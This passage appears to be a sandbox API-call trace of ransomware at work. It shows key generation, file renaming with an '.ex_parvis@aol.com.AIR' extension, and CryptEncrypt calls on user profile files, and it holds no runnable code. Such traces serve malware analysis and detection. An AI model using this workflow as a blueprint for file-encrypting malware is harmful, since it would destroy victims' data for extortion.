lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.412] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.412] CloseHandle (hObject=0x464) returned 1 [0117.413] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.413] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.413] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.413] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x360bd8 | out: hHeap=0x2e0000) returned 1 [0117.413] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5b594d50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x5b594d50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0117.413] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338ca0 [0117.413] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363528 [0117.413] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0117.413] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363528 | out: pbBuffer=0x363528) returned 1 [0117.413] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330c38 | out: pbBuffer=0x330c38) returned 1 [0117.413] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", dwFileAttributes=0x80) returned 1 [0117.413] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 41 [0117.413] GetProcessHeap () returned 0x2e0000 [0117.413] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb8) returned 0x34af58 [0117.413] lstrcpyW (in: lpString1=0x34af58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" [0117.413] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0117.413] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0117.416] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.417] GetProcessHeap () returned 0x2e0000 [0117.417] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34af58 | out: hHeap=0x2e0000) returned 1 [0117.417] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=20) returned 1 [0117.417] SetFilePointer (in: hFile=0x464, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x14 [0117.417] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0117.417] GetProcessHeap () returned 0x2e0000 [0117.417] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363630 [0117.417] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363630*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363630*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0117.417] WriteFile (in: hFile=0x464, lpBuffer=0x363630*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363630*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0117.418] WriteFile (in: hFile=0x464, lpBuffer=0x330c38*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330c38*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0117.418] WriteFile (in: hFile=0x464, lpBuffer=0x330c38*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330c38*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0117.418] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x14) returned 0x343290 [0117.418] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x14) returned 0x3432b0 [0117.418] SetFilePointer (in: hFile=0x464, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.418] ReadFile (in: hFile=0x464, lpBuffer=0x343290, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x343290*, lpNumberOfBytesRead=0x2acf9c8*=0x14, lpOverlapped=0x0) returned 1 [0117.419] SetFilePointer (in: hFile=0x464, lDistanceToMove=-20, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.419] WriteFile (in: hFile=0x464, lpBuffer=0x3432b0*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3432b0*, lpNumberOfBytesWritten=0x2acf9c8*=0x14, lpOverlapped=0x0) returned 1 [0117.419] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x343290 | out: hHeap=0x2e0000) returned 1 [0117.419] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3432b0 | out: hHeap=0x2e0000) returned 1 [0117.419] CloseHandle (hObject=0x464) returned 1 [0117.420] GetProcessHeap () returned 0x2e0000 [0117.420] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363630 | out: hHeap=0x2e0000) returned 1 [0117.420] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363528 | out: hHeap=0x2e0000) returned 1 [0117.420] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.420] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338ca0 | out: hHeap=0x2e0000) returned 1 [0117.420] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338a98 | out: hHeap=0x2e0000) returned 1 [0117.420] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363528 [0117.420] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363630 [0117.420] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0117.420] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363630 | out: pbBuffer=0x363630) returned 1 [0117.420] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330c38 | out: pbBuffer=0x330c38) returned 1 [0117.420] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x80) returned 1 [0117.420] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 123 [0117.420] GetProcessHeap () returned 0x2e0000 [0117.420] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x15c) returned 0x383d58 [0117.420] lstrcpyW (in: lpString1=0x383d58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0117.420] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.12781717671972518758.ex_parvis@aol.com.AIR" [0117.420] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0117.420] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0117.420] GetProcessHeap () returned 0x2e0000 [0117.420] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d58 | out: hHeap=0x2e0000) returned 1 [0117.421] CloseHandle (hObject=0xffffffff) returned 0 [0117.421] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363528 | out: hHeap=0x2e0000) returned 1 [0117.421] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363420 | out: hHeap=0x2e0000) returned 1 [0117.421] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363420 [0117.421] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363528 [0117.421] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c48 [0117.421] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363528 | out: pbBuffer=0x363528) returned 1 [0117.421] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330c48 | out: pbBuffer=0x330c48) returned 1 [0117.421] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x80) returned 1 [0117.421] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 123 [0117.421] GetProcessHeap () returned 0x2e0000 [0117.421] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x15c) returned 0x383d58 [0117.421] lstrcpyW (in: lpString1=0x383d58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0117.421] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.12781717671972518758.ex_parvis@aol.com.AIR" [0117.421] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0117.421] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0117.421] GetProcessHeap () returned 0x2e0000 [0117.421] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d58 | out: hHeap=0x2e0000) returned 1 [0117.421] CloseHandle (hObject=0xffffffff) returned 0 [0117.421] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363420 | out: hHeap=0x2e0000) returned 1 [0117.421] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363318 | out: hHeap=0x2e0000) returned 1 [0117.421] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ab48 [0117.421] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363318 [0117.422] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c58 [0117.422] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363318 | out: pbBuffer=0x363318) returned 1 [0117.422] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330c58 | out: pbBuffer=0x330c58) returned 1 [0117.422] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", dwFileAttributes=0x80) returned 1 [0117.422] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 86 [0117.422] GetProcessHeap () returned 0x2e0000 [0117.422] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x112) returned 0x383d58 [0117.422] lstrcpyW (in: lpString1=0x383d58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0117.422] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.12781717671972518758.ex_parvis@aol.com.AIR" [0117.422] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0117.422] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0117.422] GetProcessHeap () returned 0x2e0000 [0117.422] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d58 | out: hHeap=0x2e0000) returned 1 [0117.422] CloseHandle (hObject=0xffffffff) returned 0 [0117.422] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ab48 | out: hHeap=0x2e0000) returned 1 [0117.422] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0117.422] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338a98 [0117.422] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363420 [0117.422] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x308318 [0117.422] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363420 | out: pbBuffer=0x363420) returned 1 [0117.422] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x308318 | out: pbBuffer=0x308318) returned 1 [0117.422] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", dwFileAttributes=0x80) returned 1 [0117.423] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned 46 [0117.423] GetProcessHeap () returned 0x2e0000 [0117.423] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc2) returned 0x383d58 [0117.423] lstrcpyW (in: lpString1=0x383d58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" [0117.423] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2.12781717671972518758.ex_parvis@aol.com.AIR" [0117.423] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0117.423] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0117.423] GetProcessHeap () returned 0x2e0000 [0117.423] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d58 | out: hHeap=0x2e0000) returned 1 [0117.423] CloseHandle (hObject=0xffffffff) returned 0 [0117.423] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338a98 | out: hHeap=0x2e0000) returned 1 [0117.423] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338a30 | out: hHeap=0x2e0000) returned 1 [0117.423] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338a30 [0117.423] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363738 [0117.423] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d70 [0117.423] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363738 | out: pbBuffer=0x363738) returned 1 [0117.423] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d70 | out: pbBuffer=0x383d70) returned 1 [0117.423] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", dwFileAttributes=0x80) returned 1 [0117.423] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned 46 [0117.423] GetProcessHeap () returned 0x2e0000 [0117.423] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc2) returned 0x384158 [0117.424] lstrcpyW (in: lpString1=0x384158, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" [0117.424] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.12781717671972518758.ex_parvis@aol.com.AIR" [0117.424] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0117.424] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0117.424] GetProcessHeap () returned 0x2e0000 [0117.424] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384158 | out: hHeap=0x2e0000) returned 1 [0117.424] CloseHandle (hObject=0xffffffff) returned 0 [0117.424] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338a30 | out: hHeap=0x2e0000) returned 1 [0117.424] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3389c8 | out: hHeap=0x2e0000) returned 1 [0117.424] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3389c8 [0117.424] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363840 [0117.424] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d80 [0117.424] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363840 | out: pbBuffer=0x363840) returned 1 [0117.424] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d80 | out: pbBuffer=0x383d80) returned 1 [0117.424] SetFileAttributesW 